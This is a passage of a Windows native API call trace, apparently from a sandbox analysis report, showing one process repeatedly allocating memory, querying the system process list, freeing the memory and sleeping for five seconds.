BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.956] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 